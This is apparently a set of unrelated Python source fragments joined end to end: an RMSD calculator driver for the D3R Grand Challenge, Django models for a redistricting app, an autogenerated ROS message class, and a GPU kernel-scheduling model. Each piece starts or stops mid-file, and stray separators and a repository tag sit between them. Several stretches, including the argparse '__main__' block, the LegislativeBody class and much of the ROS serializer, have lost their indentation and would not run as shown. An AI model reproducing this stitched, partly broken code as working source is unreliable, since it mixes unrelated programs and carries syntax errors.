        shutil.copy(template_file, submitted_folder_path)
def main_rmsd(submitted_folder_path, template_folder_path, realigned=True):
    """Driver: compute RMSDs for every submitted .mol file in a folder.

    Copies the answer/template files into the submission folder, chdir's
    into it, and for each submitted "*.mol" file pairs it with every
    matching "<ligand_ID>-*_ligand1.pdb" template, calling
    rmsd_calculation() for each pair. Results are accumulated into
    "Overall_rmsd_realigned.csv" (or "Overall_rmsd.csv" when
    realigned=False) inside the submission folder.

    Side effects: changes the process working directory and deletes the
    "match*" debug files written by mcs().
    """
    #inside the submission folder, search for all submitted mol files and extract the corresponding temaplte file from the template folder and calculate the rmsd
    copy_template(template_folder_path, submitted_folder_path)
    os.chdir(submitted_folder_path)
    if realigned:
        out_rmsd_csv = open("Overall_rmsd_realigned.csv", "w")
    else:
        out_rmsd_csv = open("Overall_rmsd.csv", "w")
    # CSV header row
    all_rmsd_data = ["%-20s,%-20s,%-20s\n"%("Submitted_Ligand", "Template_Ligand", "RMSD")]
    for input_ligand in glob.glob("*.mol"):
        #example mol file format: 3OOF-FXR_13-2.mol
        print('we are looping through:', input_ligand)
        # middle token of the file name identifies the ligand (e.g. FXR_13)
        ligand_ID = input_ligand.split("-")[1]
        input_ligand_title = os.path.splitext(input_ligand)[0]
        input_protein = input_ligand_title + ".pdb"
        template_ligand_suffix = "_ligand1.pdb"
        template_protein_suffix = ".pdb"
        all_template_ligands = glob.glob("%s-*%s"%(ligand_ID, template_ligand_suffix))
        #print(ligand_ID)
        #print(input_ligand_title)
        #print(input_protein)
        #print(template_ligand_suffix)
        #print(all_template_ligands)
        for template_ligand in all_template_ligands:
            # the template complex shares the template ligand's prefix
            template_protein_complex = template_ligand.split(template_ligand_suffix)[0] + template_protein_suffix
            #here apply the rmsd_calculation
            this_rmsd = rmsd_calculation(input_ligand, template_ligand, input_protein, template_protein_complex, realignment=realigned)
            new_data = "%-20s,%-20s,%-20s\n"%(input_ligand, template_ligand, this_rmsd)
            all_rmsd_data.append(new_data)
        # NOTE(review): listdir("..") enumerates the *parent* directory, but
        # os.path.isfile(file)/os.remove(file) resolve relative to the
        # *current* directory -- likely "." was intended; confirm.
        for file in os.listdir(".."):
            if os.path.isfile(file) and "match" in file:
                try:
                    os.remove(file)
                    print('we have succesfully removed:',file)
                except:
                    print('cannot remove file:', file)
        print()
    out_rmsd_csv.writelines(all_rmsd_data)
    #clean up atom mapping files
    all_mapping_files = glob.glob("match*")
    for mapping_file in all_mapping_files:
        os.remove(mapping_file)
if ("__main__") == (__name__):
from argparse import ArgumentParser
desc = """
This code was design to evaluate the pose prediction of D3R Grand Challenge 2
For more infomation about the challenge, please visit https://drugdesigndata.org/
######Usage exmaple######
### Use the alignment option to realign the submitted structure onto the crystal position###
### Here the answer file under folder template_at_crystal_position should be used ###
# python RMSD_calculator.py --submitdir ./example_submission_folder --templatedir ./template_at_crystal_position --alignment
### Directly calculate the RMSDs between submitted structure with the template ligand ###
### Here the answer file under folder template_at_APO_position should be used ###
# python RMSD_calculator.py --submitdir ./example_submission_folder --templatedir ./template_at_APO_position
#Note for FXR system, we notice that using the alignment option will get a slightly lower RMSDs, so our reported RMSDs are RMSDs with the alignment method.
#########################
######Output#######
### Overall_rmsd_realigned.csv/Overall_rmsd.csv (depend on usage the alignment option)
### Output files are under example_submission_folder
###################
######Dependencies######
#openeye oechem tools for RMSD calculation
#schrodinger tools for alignment if use the alignment option
########################
"""
| |
"""
Define the models used by the redistricting app.
The classes in redistricting.models define the data models used in the
application. Each class relates to one table in the database; foreign key
fields may define a second, intermediate table to map the records to one
another.
This file is part of The Public Mapping Project
https://github.com/PublicMapping/
License:
Copyright 2010-2012 <NAME>, <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author:
<NAME>, <NAME>, <NAME>
"""
from celery.task import task
from django.core.exceptions import ValidationError
from django.contrib.gis.db import models
from django.contrib.gis.geos import (MultiPolygon, Polygon, GEOSGeometry,
GEOSException, GeometryCollection, Point)
from django.contrib.gis.db.models.query import GeoQuerySet
from django.contrib.gis.db.models import Collect, Extent
from django.contrib.auth.models import User
from django.db.models import Sum, Max, Q, Count
from django.db.models.signals import pre_save, post_save, m2m_changed
from django.db import connection, transaction
from django.forms import ModelForm
from django.conf import settings
from django.utils import translation
from django.utils.translation import ugettext as _
from django.template.loader import render_to_string
from django_comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.template.defaultfilters import title
from redistricting.calculators import PolsbyPopper, Contiguity, SumValues
from tagging.models import TaggedItem, Tag
from tagging.registry import register
from datetime import datetime
from copy import copy
import json
from decimal import *
from operator import attrgetter
import polib
from traceback import format_exc
import os, sys, cPickle, types, tagging, re, logging
logger = logging.getLogger(__name__)
# Caches for po files
I18N_CACHE = {}
class BaseModel(models.Model):
    """
    A base class for models that have short labels, labels, and long descriptions.
    Any class that extends this base class must have a 'name' field.
    """

    def __init__(self, *args, **kwargs):
        """
        Initialize the message file cache.
        """
        super(BaseModel, self).__init__(*args, **kwargs)
        # Hardcoding to avoid a bug in Django 1.8 get_language
        # (refer to https://github.com/django-parler/django-parler/issues/90)
        lang = translation.get_language() or settings.LANGUAGE_CODE
        if not lang in I18N_CACHE:
            try:
                # Prefer the compiled message catalog (.mo)...
                path = os.path.join(
                    settings.STATIC_ROOT,
                    '../locale/%s/LC_MESSAGES/xmlconfig.mo' % lang)
                path = os.path.normpath(path)
                I18N_CACHE[lang] = polib.mofile(path)
            except Exception as ex:
                # ...falling back to the plain-text catalog (.po)
                path = os.path.join(
                    settings.STATIC_ROOT,
                    '../locale/%s/LC_MESSAGES/xmlconfig.po' % lang)
                path = os.path.normpath(path)
                I18N_CACHE[lang] = polib.pofile(path)

    def _get_translation(self, suffix):
        """
        Look up the translated message '<name> <suffix>' in the catalog for
        the active language, falling back to the msgid itself when no
        translation is found. (Factors out the lookup previously duplicated
        across get_short_label/get_label/get_long_description.)
        """
        msgid = u'%s %s' % (self.name, suffix)
        try:
            lang = translation.get_language()
            return I18N_CACHE[lang].find(msgid).msgstr
        except Exception:
            logger.debug('Cannot find msgid %s, fallback to msgid', msgid)
            return msgid

    def get_short_label(self):
        """
        Get the short label (a.k.a. title) of the object.
        """
        return self._get_translation(u'short label')

    def get_label(self):
        """
        Get the label of the object. This is longer than the short label, and
        shorter than the description. Most often, this is the default text
        representation of an object.
        """
        return self._get_translation(u'label')

    def get_long_description(self):
        """
        Get the description of the object. This is a verbose description of the
        object.
        """
        return self._get_translation(u'long description')

    class Meta:
        abstract = True
class Subject(BaseModel):
    """
    A classification of a set of Characteristics.

    A Subject classifies the Characteristics of a Geounit. Or, each Geounit
    has one Characteristic per Subject.

    If you think about it in GIS terms:
        a Geounit is a Feature,
        a Subject is an Attribute on a Geounit, and
        a Characteristic is a Data Value for a Subject.
    """

    # The name of the subject (POPTOT)
    name = models.CharField(max_length=50)
    # If this subject should be displayed as a percentage,
    # a district's value for this subject will be divided by
    # the value for the given subject.
    # A null value indicates that the subject is not a percentage
    percentage_denominator = models.ForeignKey(
        'Subject', null=True, blank=True)
    # A flag that indicates if this subject should be displayed.
    is_displayed = models.BooleanField(default=True)
    # The position that this subject should be in, relative to all other
    # Subjects, when viewing the subjects in a list.
    sort_key = models.PositiveIntegerField(default=1)
    # The way this Subject's values should be represented.
    format_string = models.CharField(max_length=50, blank=True)
    # The version of this subject, to keep track of uploaded changes
    version = models.PositiveIntegerField(default=1)

    class Meta:
        """
        Additional information about the Subject model.
        """
        # The default method of sorting Subjects should be by 'sort_key'
        ordering = ['sort_key']
        # A unique constraint on the name
        unique_together = ('name', )

    def __unicode__(self):
        """
        Represent the Subject as a unicode string. This is the Subject's
        display name.
        """
        return self.get_label()
class ChoicesEnum(object):
    """
    Helper class for defining enumerated choices in a Model.

    Keyword arguments map attribute names to (value, display) tuples, e.g.
    ChoicesEnum(DONE=('OK', 'Done')). Attribute access returns the stored
    value ('OK'), and choices() returns the sorted list of tuples in the
    shape Django expects for a field's 'choices' option.
    """

    def __init__(self, *args, **kwargs):
        super(ChoicesEnum, self).__init__()
        vals = {}
        for key, val in kwargs.items():
            vals[key] = val
        # Bypass our own __setattr__, which writes *into* the _vals dict.
        object.__setattr__(self, "_vals", vals)

    def choices(self):
        """Return the sorted list of (value, display) tuples."""
        cho = []
        vals = object.__getattribute__(self, "_vals")
        for key, val in vals.items():
            cho.append(val)
        cho.sort()
        return cho

    def __getattr__(self, name):
        return object.__getattribute__(self, "_vals")[name][0]

    def __setattr__(self, name, value):
        # BUG FIX: this used to call object.__setattr__(self, "_vals") with
        # the wrong arity (TypeError: missing the value argument) and then
        # tried to mutate an immutable tuple in place. Rebuild the entry,
        # replacing the stored value and keeping the display label(s).
        vals = object.__getattribute__(self, "_vals")
        vals[name] = (value,) + tuple(vals[name][1:])

    def __delattr__(self, name):
        # BUG FIX: previously used object.__setattr__ (wrong method and
        # wrong arity) where a read of the _vals dict was intended.
        del object.__getattribute__(self, "_vals")[name]
# Workflow states for an uploaded subject file; each entry is a
# (stored two-letter code, human-readable label) pair, consumed by
# SubjectUpload.status below.
UploadedState = ChoicesEnum(
    UNKNOWN=('NA', 'Not Available'),
    UPLOADING=('UL', 'Uploading'),
    CHECKING=('CH', 'Checking'),
    DONE=('OK', 'Done'),
    ERROR=('ER', 'Error'),
)
class SubjectUpload(models.Model):
    """
    A set of uploaded subjects. This is primarily used to prevent collisions
    during the long verification step.
    """

    # The automatically generated (server-side) file name
    processing_filename = models.CharField(max_length=256)
    # The user-specified file name as originally uploaded
    upload_filename = models.CharField(max_length=256)
    # Subject name
    subject_name = models.CharField(max_length=50)
    # The status of the uploaded subject; one of the two-letter codes
    # defined by UploadedState (defaults to 'NA'/Not Available)
    status = models.CharField(
        max_length=2,
        choices=UploadedState.choices(),
        default=UploadedState.UNKNOWN)
    # The task ID that is processing this uploaded subject
    # (36 chars -- the length of a UUID string; presumably a Celery task
    # id, TODO confirm against the task dispatch code)
    task_id = models.CharField(max_length=36)
class SubjectStage(models.Model):
    """
    A quarantine table for uploaded subjects. This model stores temporary subject
    datasets that are being imported into the system.
    """

    # An identifier to discriminate between multiple uploads.
    upload = models.ForeignKey(SubjectUpload)
    # The GEOID, or FIPS ID of the geounit
    portable_id = models.CharField(max_length=50)
    # The data value of the geounit (up to 12 digits, 4 decimal places).
    number = models.DecimalField(max_digits=12, decimal_places=4)
class Region(BaseModel):
    """
    A region is a compartmentalized area of geography, legislative bodies,
    and validation criteria. Each region shares the base geography, but may
    be active over a subsection. In addition, legislative bodies are contained
    within one region at a time.
    """

    # The name of this region
    name = models.CharField(max_length=256)
    # The sorting order for this region relative to other regions
    sort_key = models.PositiveIntegerField(default=0)

    def __unicode__(self):
        """
        Represent the Region as a unicode string. This is the Region's name.
        """
        return self.name

    class Meta:
        """
        Additional information about the Region model.
        """
        # A unique constraint on the name
        unique_together = ('name', )
class LegislativeBody(BaseModel):
"""
A legislative body that plans belong to. This is to support the
scenario where one application is supporting both "Congressional"
and "School District" contests, for example.
"""
# The name of this legislative body
name = models.CharField(max_length=256)
# The maximum number of districts in this body
max_districts = models.PositiveIntegerField()
# Whether or not districts of this legislative body are allowed multi-members
multi_members_allowed = models.BooleanField(default=False)
# The format to be used for displaying a map label of a multi-member district.
# This format string will be passed to python's 'format' function with the named
# arguments: 'label' (district label) and 'num_members' (number of representatives)
# For example: "{label} - [{num_members}]" will display "District 5 - [3]" for a district named
# "District 5" that is configured with 3 representatives.
multi_district_label_format = models.CharField(
max_length=32, default='{label} - [{num_members}]')
# The minimimum number of multi-member districts allowed in a plan.
min_multi_districts = models.PositiveIntegerField(default=0)
# The maximum number of multi-member districts allowed in a plan.
max_multi_districts = models.PositiveIntegerField(default=0)
# The minimimum number of members allowed in a multi-member district.
min_multi_district_members = models.PositiveIntegerField(default=0)
# The maximimum number of members allowed in a multi-member district.
max_multi_district_members = models.PositiveIntegerField(default=0)
# The minimumum total number of members allowed in a plan.
min_plan_members = models.PositiveIntegerField(default=0)
# The maximumum total number of members allowed in a plan.
max_plan_members = models.PositiveIntegerField(default=0)
# A flag indicating if this legislative body contains community maps
is_community = models.BooleanField(default=False)
# Where in the list of legislative bodies should this item appear?
| |
<gh_stars>0
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from derived_object_msgs/ObjectArray.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import geometry_msgs.msg
import derived_object_msgs.msg
import shape_msgs.msg
import protocol.std_msgs.msg as std_msgs
class ObjectArray(genpy.Message):
_md5sum = "492c83cd255b9a57845d0c197d7977be"
_type = "derived_object_msgs/ObjectArray"
_has_header = True #flag to mark the presence of a Header object
_full_text = """std_msgs/Header header
derived_object_msgs/Object[] objects
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: derived_object_msgs/Object
# This represents a detected or tracked object with reference coordinate frame and timestamp.
std_msgs/Header header
# The id of the object (presumably from the detecting sensor).
uint32 id
# A Detected object is one which has been seen in at least one scan/frame of a sensor.
# A Tracked object is one which has been correlated over multiple scans/frames of a sensor.
# An object which is detected can only be assumed to have valid pose and shape properties.
# An object which is tracked should also be assumed to have valid twist and accel properties.
uint8 detection_level
uint8 OBJECT_DETECTED=0
uint8 OBJECT_TRACKED=1
# A Classified object is one which has been identified as a certain object type.
# Classified objects should have valid classification, classification_certainty, and classification_age properties.
bool object_classified
# The detected position and orientation of the object.
geometry_msgs/Pose pose
# The detected linear and angular velocities of the object.
geometry_msgs/Twist twist
# The detected linear and angular accelerations of the object.
geometry_msgs/Accel accel
# (OPTIONAL) The polygon defining the detection points at the outer edges of the object.
geometry_msgs/Polygon polygon
# A shape conforming to the outer bounding edges of the object.
shape_msgs/SolidPrimitive shape
# The type of classification given to this object.
uint8 classification
uint8 CLASSIFICATION_UNKNOWN=0
uint8 CLASSIFICATION_UNKNOWN_SMALL=1
uint8 CLASSIFICATION_UNKNOWN_MEDIUM=2
uint8 CLASSIFICATION_UNKNOWN_BIG=3
uint8 CLASSIFICATION_PEDESTRIAN=4
uint8 CLASSIFICATION_BIKE=5
uint8 CLASSIFICATION_CAR=6
uint8 CLASSIFICATION_TRUCK=7
uint8 CLASSIFICATION_MOTORCYCLE=8
uint8 CLASSIFICATION_OTHER_VEHICLE=9
uint8 CLASSIFICATION_BARRIER=10
uint8 CLASSIFICATION_SIGN=11
# The certainty of the classification from the originating sensor.
# Higher value indicates greater certainty (MAX=255).
# It is recommended that a native sensor value be scaled to 0-255 for interoperability.
uint8 classification_certainty
# The number of scans/frames from the sensor that this object has been classified as the current classification.
uint32 classification_age
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of position and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: geometry_msgs/Twist
# This expresses velocity in free space broken into its linear and angular parts.
Vector3 linear
Vector3 angular
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
# It is only meant to represent a direction. Therefore, it does not
# make sense to apply a translation to it (e.g., when applying a
# generic rigid transformation to a Vector3, tf2 will only apply the
# rotation). If you want your data to be translatable too, use the
# geometry_msgs/Point message instead.
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Accel
# This expresses acceleration in free space broken into its linear and angular parts.
Vector3 linear
Vector3 angular
================================================================================
MSG: geometry_msgs/Polygon
#A specification of a polygon where the first and last points are assumed to be connected
Point32[] points
================================================================================
MSG: geometry_msgs/Point32
# This contains the position of a point in free space(with 32 bits of precision).
# It is recommeded to use Point wherever possible instead of Point32.
#
# This recommendation is to promote interoperability.
#
# This message is designed to take up less space when sending
# lots of points at once, as in the case of a PointCloud.
float32 x
float32 y
float32 z
================================================================================
MSG: shape_msgs/SolidPrimitive
# Define box, sphere, cylinder, cone
# All shapes are defined to have their bounding boxes centered around 0,0,0.
uint8 BOX=1
uint8 SPHERE=2
uint8 CYLINDER=3
uint8 CONE=4
# The type of the shape
uint8 type
# The dimensions of the shape
float64[] dimensions
# The meaning of the shape dimensions: each constant defines the index in the 'dimensions' array
# For the BOX type, the X, Y, and Z dimensions are the length of the corresponding
# sides of the box.
uint8 BOX_X=0
uint8 BOX_Y=1
uint8 BOX_Z=2
# For the SPHERE type, only one component is used, and it gives the radius of
# the sphere.
uint8 SPHERE_RADIUS=0
# For the CYLINDER and CONE types, the center line is oriented along
# the Z axis. Therefore the CYLINDER_HEIGHT (CONE_HEIGHT) component
# of dimensions gives the height of the cylinder (cone). The
# CYLINDER_RADIUS (CONE_RADIUS) component of dimensions gives the
# radius of the base of the cylinder (cone). Cone and cylinder
# primitives are defined to be circular. The tip of the cone is
# pointing up, along +Z axis.
uint8 CYLINDER_HEIGHT=0
uint8 CYLINDER_RADIUS=1
uint8 CONE_HEIGHT=0
uint8 CONE_RADIUS=1
"""
__slots__ = ['header','objects']
_slot_types = ['std_msgs/Header','derived_object_msgs/Object[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,objects
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ObjectArray, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.Header()
if self.objects is None:
self.objects = []
else:
self.header = std_msgs.Header()
self.objects = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
  def serialize(self, buff):
    """
    serialize message into buffer
    :param buff: buffer, ``StringIO``
    """
    try:
      # top-level header: seq/stamp as three little-endian uint32,
      # then frame_id as a length-prefixed utf-8 byte string
      _x = self
      buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
      _x = self.header.frame_id
      length = len(_x)
      if python3 or type(_x) == unicode:
        _x = _x.encode('utf-8')
        length = len(_x)
      buff.write(struct.pack('<I%ss'%length, length, _x))
      # objects array: uint32 element count, then each serialized Object
      length = len(self.objects)
      buff.write(_struct_I.pack(length))
      for val1 in self.objects:
        # per-object header (seq, stamp, frame_id)
        _v1 = val1.header
        buff.write(_get_struct_I().pack(_v1.seq))
        _v2 = _v1.stamp
        _x = _v2
        buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
        _x = _v1.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
          _x = _x.encode('utf-8')
          length = len(_x)
        buff.write(struct.pack('<I%ss'%length, length, _x))
        # id (uint32), detection_level (uint8), object_classified (uint8/bool)
        _x = val1
        buff.write(_get_struct_I2B().pack(_x.id, _x.detection_level, _x.object_classified))
        # pose: position (3 x float64) + orientation quaternion (4 x float64)
        _v3 = val1.pose
        _v4 = _v3.position
        _x = _v4
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        _v5 = _v3.orientation
        _x = _v5
        buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
        # twist: linear + angular velocity (3 x float64 each)
        _v6 = val1.twist
        _v7 = _v6.linear
        _x = _v7
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        _v8 = _v6.angular
        _x = _v8
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        # accel: linear + angular acceleration (3 x float64 each)
        _v9 = val1.accel
        _v10 = _v9.linear
        _x = _v10
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        _v11 = _v9.angular
        _x = _v11
        buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
        # polygon: uint32 point count, then each Point32 (3 x float32)
        _v12 = val1.polygon
        length = len(_v12.points)
        buff.write(_struct_I.pack(length))
        for val3 in _v12.points:
          _x = val3
          buff.write(_get_struct_3f().pack(_x.x, _x.y, _x.z))
        # shape: type byte, then length-prefixed float64[] dimensions
        _v13 = val1.shape
        buff.write(_get_struct_B().pack(_v13.type))
        length = len(_v13.dimensions)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd'%length
        buff.write(struct.pack(pattern, *_v13.dimensions))
        # classification (uint8), certainty (uint8), classification_age (uint32)
        _x = val1
        buff.write(_get_struct_B().pack(_x.classification))
        buff.write(_get_struct_B().pack( _x.classification_certainty))
        buff.write(_get_struct_I().pack( _x.classification_age))
    # genpy convention: wrap low-level packing errors so the reported message
    # names the offending field value (_x) for easier debugging
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.Header()
if self.objects is None:
self.objects = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.objects = []
for i in range(0, length):
val1 = derived_object_msgs.msg.Object()
_v14 = val1.header
start = end
end += 4
(_v14.seq,) = _get_struct_I().unpack(str[start:end])
_v15 = _v14.stamp
_x = _v15
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v14.frame_id = str[start:end].decode('utf-8')
else:
_v14.frame_id = str[start:end]
_x = val1
start = end
end += 6
(_x.id, _x.detection_level, _x.object_classified,) = _get_struct_I2B().unpack(str[start:end])
val1.object_classified = bool(val1.object_classified)
_v16 = val1.pose
_v17 = | |
# <filename>mem_mem/avgblk.py  (dataset artifact, commented out to keep the file parseable)
import pandas as pd
import numpy as np
from math import *
import copy # deep copy objects
from model_param import *
#------------------------------------------------------------------------------
# Figure out when to launch another block for current kernel
#------------------------------------------------------------------------------
def Search_block_start(df_sm_trace, current_kernel_id):
    """
    Read the sm_trace table and return the latest ``block_start`` among the
    active blocks on this SM, preferring blocks that belong to
    ``current_kernel_id``.  Returns 0.0 when no block is active.
    """
    active = df_sm_trace[df_sm_trace['active'] == 1]
    if active.empty:
        # all blocks on this sm are done / de-activated  (warning case)
        return 0.0

    # prefer the closest block of the current kernel, if any
    same_kernel = active[active['kernel_id'] == current_kernel_id]
    if not same_kernel.empty:
        return same_kernel['block_start'].max()

    # otherwise fall back to the closest block of any kernel
    return active['block_start'].max()
#------------------------------------------------------------------------------
# Figure out which sm to start for current kernel
#------------------------------------------------------------------------------
def find_sm2start(sm_trace_list, kern_start):
    """
    Decide which SM the kernel should start on.

    :param sm_trace_list: list of per-SM trace DataFrames
    :param kern_start: kernel launch time (ms)
    :return: (sm_id, AfterPrevKern) where AfterPrevKern is True when every
             previously traced block already ended before kern_start
    """
    after_prev_kern = False
    total_sms = len(sm_trace_list)

    # case 1) no trace recorded on any sm yet -> start on sm 0
    if all(trace.empty for trace in sm_trace_list):
        return 0, after_prev_kern

    # case 2) by the time the kernel starts, every traced block has
    # finished -> start on sm 0 and flag AfterPrevKern
    latest_end = 0
    for trace in sm_trace_list:
        trace_max = trace.block_end.max()
        if trace_max > latest_end:
            latest_end = trace_max
    if latest_end <= kern_start:
        after_prev_kern = True
        return 0, after_prev_kern

    # case 3) some blocks are still running: pick the sm whose active
    # blocks finish earliest
    first = sm_trace_list[0]
    earliest_end = first.loc[first['active'] == 1].block_end.min()
    target_sm = 0
    for idx in range(1, total_sms):
        trace = sm_trace_list[idx]
        candidate = trace.loc[trace['active'] == 1].block_end.min()
        if candidate < earliest_end:
            earliest_end = candidate
            target_sm = idx
    return target_sm, after_prev_kern
#------------------------------------------------------------------------------
# model cke function
#------------------------------------------------------------------------------
def cke_model(Gpu, sms_, sm_trace_, kernels_):
    """Model concurrent kernel execution (CKE) on one GPU.

    Dispatches every kernel's thread blocks round-robin over the SMs,
    tracking per-SM resource usage (``sms``) and a per-SM trace table
    (``sm_trace``) with one row per scheduled block.

    :param Gpu: device descriptor; only ``Gpu.sm_num`` is used here
    :param sms_: list of per-SM resource objects (Allocate_block/Rm API)
    :param sm_trace_: list of per-SM pandas DataFrames (trace tables)
    :param kernels_: kernel descriptors (gridDim, start_ms, avg_blk_time)
    :return: tuple ``(sms, sm_trace)`` — updated deep copies of the inputs
    """
    # deep copy the input: the caller's resource/trace state is not mutated
    sms = copy.deepcopy(sms_)
    sm_trace = copy.deepcopy(sm_trace_)
    kernels = copy.deepcopy(kernels_)

    kernel_num = len(kernels)
    sm_num = Gpu.sm_num

    # go through each kernel
    for i in range(kernel_num):
        kern = kernels[i]                  # schedule current kernel on the device
        kernel_blocks = int(kern.gridDim)  # total blocks for current kern
        kern_start = kern.start_ms

        # 1) find which sm to start on
        # 2) whether kernel_start happens after the previous kernel ended
        sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)

        #---------------------------------------------------------
        # Run after previous kernel: retire all still-active blocks
        #---------------------------------------------------------
        if AfterPrevKern:
            myid = 0
            for df_sm in sm_trace:
                df_activeblk = df_sm.loc[df_sm['active'] == 1]
                for index, row in df_activeblk.iterrows():
                    # BUGFIX: single-step .loc[row, col] assignment. The original
                    # chained form  sm_trace[myid].loc[index]['active'] = 0
                    # assigns into a temporary Series and silently leaves the
                    # trace table unchanged (pandas chained-assignment pitfall).
                    sm_trace[myid].loc[index, 'active'] = 0
                    sms[myid].Rm(kern)  # free the block resource
                myid = myid + 1

        #---------------------------------------------------------
        # Continue current kernel: dispatch its blocks round-robin
        #---------------------------------------------------------
        for bid in range(kernel_blocks):
            sm_id = (bid + sm2start) % sm_num
            to_allocate_another_block = check_sm_resource(sms[sm_id], kern)

            #----------------------------------
            # there is enough resource to host the current block
            #----------------------------------
            if to_allocate_another_block == True:
                # deduct resources on the current sm
                sms[sm_id].Allocate_block(kern)

                block_start = None
                offset = 0.0
                # Noted: only the 1st wave of blocks adjusts the kern_start
                if AfterPrevKern and bid < sm_num:
                    offset = kern_start

                if sm_trace[sm_id].empty:
                    # empty trace table: block starts with the kernel itself
                    block_start = kern_start
                else:
                    # earliest start among the active blocks on current sm
                    block_start = Search_block_start(sm_trace[sm_id], i) + offset

                block_end = block_start + kern.avg_blk_time

                # register the block in the trace table
                sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
                                                          'block_id': bid,
                                                          'block_start': block_start,
                                                          'block_end': block_end,
                                                          'batch_id': sms[sm_id].batch,
                                                          'kernel_id': i,
                                                          'active': 1}, ignore_index=True)

            #-------------------------------------------
            # No more resources: the SM is full. Retire the active blocks
            # ending soonest until the current block fits, then start the
            # current block when those blocks finish.
            #-------------------------------------------
            if to_allocate_another_block == False:
                df_sm = sm_trace[sm_id]
                df_activeblk = df_sm.loc[df_sm['active'] == 1]
                df_loc = df_activeblk.copy(deep=True)
                cur_activeblk_num = df_activeblk.shape[0]

                for ii in range(cur_activeblk_num):
                    # find the active blocks ending soonest
                    blkend_min = df_loc['block_end'].min()
                    df_blk2end = df_loc.loc[df_loc['block_end'] == blkend_min]

                    # retire those blocks (BUGFIX: .loc[row, col] — see above)
                    for index, row in df_blk2end.iterrows():
                        sm_trace[sm_id].loc[index, 'active'] = 0
                        sms[sm_id].Rm(kern)  # free the block resource

                    if check_sm_resource(sms[sm_id], kern):
                        # enough room now: allocate; block starts when the
                        # retired blocks end
                        sms[sm_id].Allocate_block(kern)
                        block_start = blkend_min
                        block_end = block_start + kern.avg_blk_time
                        break  # jump out of the loop
                    else:
                        # NOTE(review): df_loc is never shrunk, so the next pass
                        # recomputes the same minimum and calls Rm() on the same
                        # rows again (preserved from the original) — confirm the
                        # retired rows should be dropped from df_loc here.
                        pass

                # update the trace table
                sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
                                                          'block_id': bid,
                                                          'block_start': block_start,
                                                          'block_end': block_end,
                                                          'batch_id': sms[sm_id].batch,
                                                          'kernel_id': i,
                                                          'active': 1}, ignore_index=True)
        # end of running blocks for current kernel
    # end of kernel iteration

    # return the updated sm resource and trace table
    return sms, sm_trace
#------------------------------------------------------------------------------
# Find kern time on current sm
#------------------------------------------------------------------------------
def find_kernel_time(df_sm_trace, kern_id):
    """Return (start, end) of kernel ``kern_id`` on this SM: the earliest
    block_start and the latest block_end among its rows."""
    rows = df_sm_trace[df_sm_trace.kernel_id == kern_id]
    return rows['block_start'].min(), rows['block_end'].max()
#------------------------------------------------------------------------------
# Find out kernel runtime by reading the traces from each SM
#------------------------------------------------------------------------------
def Get_KernTime(sm_trace):
    """Collect each kernel's overall runtime from all the SM traces.

    For every kernel id appearing in any SM trace, the recorded start is the
